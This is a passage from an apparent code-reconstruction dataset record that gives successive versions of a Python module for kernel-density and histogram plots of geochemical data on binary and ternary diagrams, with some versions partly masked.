"step-2": "<mask token>\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n<mask token>\n",
"step-3": "<mask token>\nlogger = Handle(__name__)\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n_add_additional_parameters = True\ndensity.__doc__ = density.__doc__.format(otherparams=['',\n get_additional_params(density, plt.pcolormesh, plt.hist2d, plt.hexbin,\n plt.contour, plt.contourf, header='Other Parameters', indent=4,\n subsections=True)][_add_additional_parameters])\n",
"step-4": "<mask token>\nimport copy\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator\nfrom ...comp.codata import close\nfrom ...util.log import Handle\nfrom ...util.meta import get_additional_params, subkwargs\nfrom ...util.plot.axes import add_colorbar, init_axes\nfrom ...util.plot.density import get_axis_density_methods, percentile_contour_values_from_meshz, plot_Z_percentiles\nfrom ...util.plot.style import DEFAULT_CONT_COLORMAP\nfrom .grid import DensityGrid\nfrom .ternary import ternary_heatmap\nlogger = Handle(__name__)\n\n\ndef density(arr, ax=None, logx=False, logy=False, bins=25, mode='density',\n extent=None, contours=[], percentiles=True, relim=True, cmap=\n DEFAULT_CONT_COLORMAP, shading='auto', vmin=0.0, colorbar=False, **kwargs):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == 'density') & np.isclose(vmin, 0.0):\n vmin = 0.02\n if arr.shape[-1] == 3:\n projection = 'ternary'\n else:\n projection = None\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = *ax.patch.get_facecolor()[:-1], 0.0\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap)\n cmap.set_under((1, 1, 1, 0))\n if mode == 'density':\n cbarlabel = 'Kernel Density Estimate'\n else:\n cbarlabel = 'Frequency'\n valid_rows = np.isfinite(arr).all(axis=-1)\n if mode in ['hexbin', 'hist2d'] and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n if arr.size > 0 and valid_rows.any():\n arr = arr[valid_rows]\n if projection is None:\n x, y = arr.T\n grid = DensityGrid(x, y, bins=bins, logx=logx, logy=logy,\n extent=extent, **subkwargs(kwargs, DensityGrid))\n if mode == 'hexbin':\n mappable = ax.hexbin(x, y, gridsize=bins, cmap=cmap, extent\n =grid.get_hex_extent(), xscale=['linear', 'log'][logx],\n yscale=['linear', 'log'][logy], **subkwargs(kwargs, ax.\n hexbin))\n elif mode == 'hist2d':\n _, _, _, im = ax.hist2d(x, y, bins=[grid.grid_xe, grid.\n grid_ye], range=grid.get_range(), cmap=cmap, cmin=[0, 1\n ][vmin > 0], **subkwargs(kwargs, ax.hist2d))\n mappable = im\n elif mode == 'density':\n zei = grid.kdefrom(arr, xtransform=[lambda x: x, np.log][\n logx], ytransform=[lambda y: y, np.log][logy], mode=\n 'edges', **subkwargs(kwargs, grid.kdefrom))\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zei, [1.0 -\n vmin])[1][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'\n .format(vmin))\n if not contours:\n mappable = pcolor(grid.grid_xei, grid.grid_yei, zei,\n cmap=cmap, vmin=vmin, shading=shading, **subkwargs(\n kwargs, pcolor))\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle('None')\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(grid.grid_xei, grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape), ax=ax,\n contours=contours, percentiles=percentiles, cmap=\n cmap, vmin=vmin, **kwargs)\n if relim and extent is not None:\n ax.axis(extent)\n elif projection == 'ternary':\n if shading == 'auto':\n shading = 'flat'\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == 'hexbin':\n raise NotImplementedError\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n if percentiles:\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1\n ][0]\n logger.debug('Updating `vmin` to percentile equiv: {:.2f}'.\n format(vmin))\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n if not contours:\n tri_poly_collection = pcolor(*coords.T, zi.flatten(), cmap=\n cmap, vmin=vmin, shading=shading, **subkwargs(kwargs,\n pcolor))\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(*coords.T, zi=zi.flatten(), ax=ax,\n contours=contours, percentiles=percentiles, cmap=cmap,\n vmin=vmin, **kwargs)\n ax.set_aspect('equal')\n elif not arr.ndim in [0, 1, 2]:\n raise NotImplementedError\n if colorbar:\n cbkwargs = kwargs.copy()\n cbkwargs['label'] = cbarlabel\n add_colorbar(mappable, **cbkwargs)\n return ax\n\n\ndef _add_contours(*coords, zi=None, ax=None, contours=[], cmap=\n DEFAULT_CONT_COLORMAP, vmin=0.0, extent=None, **kwargs):\n \"\"\"\n Add density-based contours to a plot.\n \"\"\"\n percentiles = kwargs.pop('percentiles', True)\n levels = contours or kwargs.get('levels', None)\n pcolor, contour, contourf = get_axis_density_methods(ax)\n if percentiles and not isinstance(levels, int):\n _cs = plot_Z_percentiles(*coords, zi=zi, ax=ax, percentiles=levels,\n extent=extent, cmap=cmap, **kwargs)\n mappable = _cs\n else:\n if levels is None:\n levels = MaxNLocator(nbins=10).tick_values(zi.min(), zi.max())\n elif isinstance(levels, int):\n levels = MaxNLocator(nbins=levels).tick_values(zi.min(), zi.max())\n else:\n raise NotImplementedError\n mappable = contourf(*coords, zi, extent=extent, levels=levels, cmap\n =cmap, vmin=vmin, **kwargs)\n contour(*coords, zi, extent=extent, levels=levels, cmap=cmap, vmin=\n vmin, **kwargs)\n return mappable\n\n\n_add_additional_parameters = True\ndensity.__doc__ = density.__doc__.format(otherparams=['',\n get_additional_params(density, plt.pcolormesh, plt.hist2d, plt.hexbin,\n plt.contour, plt.contourf, header='Other Parameters', indent=4,\n subsections=True)][_add_additional_parameters])\n",
"step-5": "\"\"\"\nKernel desnity estimation plots for geochemical data.\n\"\"\"\nimport copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.ticker import MaxNLocator\n\nfrom ...comp.codata import close\nfrom ...util.log import Handle\nfrom ...util.meta import get_additional_params, subkwargs\nfrom ...util.plot.axes import add_colorbar, init_axes\nfrom ...util.plot.density import (\n get_axis_density_methods,\n percentile_contour_values_from_meshz,\n plot_Z_percentiles,\n)\nfrom ...util.plot.style import DEFAULT_CONT_COLORMAP\nfrom .grid import DensityGrid\nfrom .ternary import ternary_heatmap\n\nlogger = Handle(__name__)\n\n\ndef density(\n arr,\n ax=None,\n logx=False,\n logy=False,\n bins=25,\n mode=\"density\",\n extent=None,\n contours=[],\n percentiles=True,\n relim=True,\n cmap=DEFAULT_CONT_COLORMAP,\n shading=\"auto\",\n vmin=0.0,\n colorbar=False,\n **kwargs\n):\n \"\"\"\n Creates diagramatic representation of data density and/or frequency for either\n binary diagrams (X-Y) or ternary plots.\n Additional arguments are typically forwarded\n to respective :mod:`matplotlib` functions\n :func:`~matplotlib.pyplot.pcolormesh`,\n :func:`~matplotlib.pyplot.hist2d`,\n :func:`~matplotlib.pyplot.hexbin`,\n :func:`~matplotlib.pyplot.contour`, and\n :func:`~matplotlib.pyplot.contourf` (see Other Parameters, below).\n\n Parameters\n ----------\n arr : :class:`numpy.ndarray`\n Dataframe from which to draw data.\n ax : :class:`matplotlib.axes.Axes`, `None`\n The subplot to draw on.\n logx : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the x axis. Values strictly >0 required.\n logy : :class:`bool`, `False`\n Whether to use a logspaced *grid* on the y axis. Values strictly >0 required.\n bins : :class:`int`, 20\n Number of bins used in the gridded functions (histograms, KDE evaluation grid).\n mode : :class:`str`, 'density'\n Different modes used here: ['density', 'hexbin', 'hist2d']\n extent : :class:`list`\n Predetermined extent of the grid for which to from the histogram/KDE. In the\n general form (xmin, xmax, ymin, ymax).\n contours : :class:`list`\n Contours to add to the plot, where :code:`mode='density'` is used.\n percentiles : :class:`bool`, `True`\n Whether contours specified are to be converted to percentiles.\n relim : :class:`bool`, :code:`True`\n Whether to relimit the plot based on xmin, xmax values.\n cmap : :class:`matplotlib.colors.Colormap`\n Colormap for mapping surfaces.\n vmin : :class:`float`, 0.\n Minimum value for colormap.\n shading : :class:`str`, 'auto'\n Shading to apply to pcolormesh.\n colorbar : :class:`bool`, False\n Whether to append a linked colorbar to the generated mappable image.\n\n {otherparams}\n\n Returns\n -------\n :class:`matplotlib.axes.Axes`\n Axes on which the densityplot is plotted.\n\n .. seealso::\n\n Functions:\n\n :func:`matplotlib.pyplot.pcolormesh`\n :func:`matplotlib.pyplot.hist2d`\n :func:`matplotlib.pyplot.contourf`\n\n Notes\n -----\n The default density estimates and derived contours are generated based on\n kernel density estimates. Assumptions around e.g. 95% of points lying within\n a 95% contour won't necessarily be valid for non-normally distributed data\n (instead, this represents the approximate 95% percentile on the kernel\n density estimate). Note that contours are currently only generated; for\n `mode=\"density\"`; future updates may allow the use of a histogram\n basis, which would give results closer to 95% data percentiles.\n\n Todo\n ----\n * Allow generation of contours from histogram data, rather than just\n the kernel density estimate.\n * Implement an option and filter to 'scatter' points below the minimum threshold\n or maximum percentile contours.\n \"\"\"\n if (mode == \"density\") & np.isclose(vmin, 0.0): # if vmin is not specified\n vmin = 0.02 # 2% max height | 98th percentile\n\n if arr.shape[-1] == 3:\n projection = \"ternary\"\n else:\n projection = None\n\n ax = init_axes(ax=ax, projection=projection, **kwargs)\n\n pcolor, contour, contourf = get_axis_density_methods(ax)\n background_color = (*ax.patch.get_facecolor()[:-1], 0.0)\n\n if cmap is not None:\n if isinstance(cmap, str):\n cmap = plt.get_cmap(cmap)\n cmap = copy.copy(cmap) # without this, it would modify the global cmap\n cmap.set_under((1, 1, 1, 0))\n\n if mode == \"density\":\n cbarlabel = \"Kernel Density Estimate\"\n else:\n cbarlabel = \"Frequency\"\n\n valid_rows = np.isfinite(arr).all(axis=-1)\n\n if (mode in [\"hexbin\", \"hist2d\"]) and contours:\n raise NotImplementedError(\n \"Contours are not currently implemented for 'hexbin' or 'hist2d' modes.\"\n )\n\n if (arr.size > 0) and valid_rows.any():\n # Data can't be plotted if there's any nans, so we can exclude these\n arr = arr[valid_rows]\n\n if projection is None: # binary\n x, y = arr.T\n grid = DensityGrid(\n x,\n y,\n bins=bins,\n logx=logx,\n logy=logy,\n extent=extent,\n **subkwargs(kwargs, DensityGrid)\n )\n if mode == \"hexbin\":\n # extent values are exponents (i.e. 3 -> 10**3)\n mappable = ax.hexbin(\n x,\n y,\n gridsize=bins,\n cmap=cmap,\n extent=grid.get_hex_extent(),\n xscale=[\"linear\", \"log\"][logx],\n yscale=[\"linear\", \"log\"][logy],\n **subkwargs(kwargs, ax.hexbin)\n )\n\n elif mode == \"hist2d\":\n _, _, _, im = ax.hist2d(\n x,\n y,\n bins=[grid.grid_xe, grid.grid_ye],\n range=grid.get_range(),\n cmap=cmap,\n cmin=[0, 1][vmin > 0],\n **subkwargs(kwargs, ax.hist2d)\n )\n mappable = im\n\n elif mode == \"density\":\n zei = grid.kdefrom(\n arr,\n xtransform=[lambda x: x, np.log][logx],\n ytransform=[lambda y: y, np.log][logy],\n mode=\"edges\",\n **subkwargs(kwargs, grid.kdefrom)\n )\n\n if percentiles: # 98th percentile\n vmin = percentile_contour_values_from_meshz(zei, [1.0 - vmin])[1][0]\n logger.debug(\n \"Updating `vmin` to percentile equiv: {:.2f}\".format(vmin)\n )\n\n if not contours:\n # pcolormesh using bin edges\n mappable = pcolor(\n grid.grid_xei,\n grid.grid_yei,\n zei,\n cmap=cmap,\n vmin=vmin,\n shading=shading,\n **subkwargs(kwargs, pcolor)\n )\n mappable.set_edgecolor(background_color)\n mappable.set_linestyle(\"None\")\n mappable.set_lw(0.0)\n else:\n mappable = _add_contours(\n grid.grid_xei,\n grid.grid_yei,\n zi=zei.reshape(grid.grid_xei.shape),\n ax=ax,\n contours=contours,\n percentiles=percentiles,\n cmap=cmap,\n vmin=vmin,\n **kwargs\n )\n if relim and (extent is not None):\n ax.axis(extent)\n elif projection == \"ternary\": # ternary\n if shading == \"auto\":\n shading = \"flat\" # auto cant' be passed to tripcolor\n # zeros make nans in this case, due to the heatmap calculations\n arr[~(arr > 0).all(axis=1), :] = np.nan\n arr = close(arr)\n if mode == \"hexbin\":\n raise NotImplementedError\n # density, histogram etc parsed here\n coords, zi, _ = ternary_heatmap(arr, bins=bins, mode=mode)\n\n if percentiles: # 98th percentile\n vmin = percentile_contour_values_from_meshz(zi, [1.0 - vmin])[1][0]\n logger.debug(\"Updating `vmin` to percentile equiv: {:.2f}\".format(vmin))\n\n # remove coords where H==0, as ax.tripcolor can't deal with variable alpha :'(\n fltr = (zi != 0) & (zi >= vmin)\n coords = coords[fltr.flatten(), :]\n zi = zi[fltr]\n\n if not contours:\n tri_poly_collection = pcolor(\n *coords.T,\n zi.flatten(),\n cmap=cmap,\n vmin=vmin,\n shading=shading,\n **subkwargs(kwargs, pcolor)\n )\n\n mappable = tri_poly_collection\n else:\n mappable = _add_contours(\n *coords.T,\n zi=zi.flatten(),\n ax=ax,\n contours=contours,\n percentiles=percentiles,\n cmap=cmap,\n vmin=vmin,\n **kwargs\n )\n ax.set_aspect(\"equal\")\n else:\n 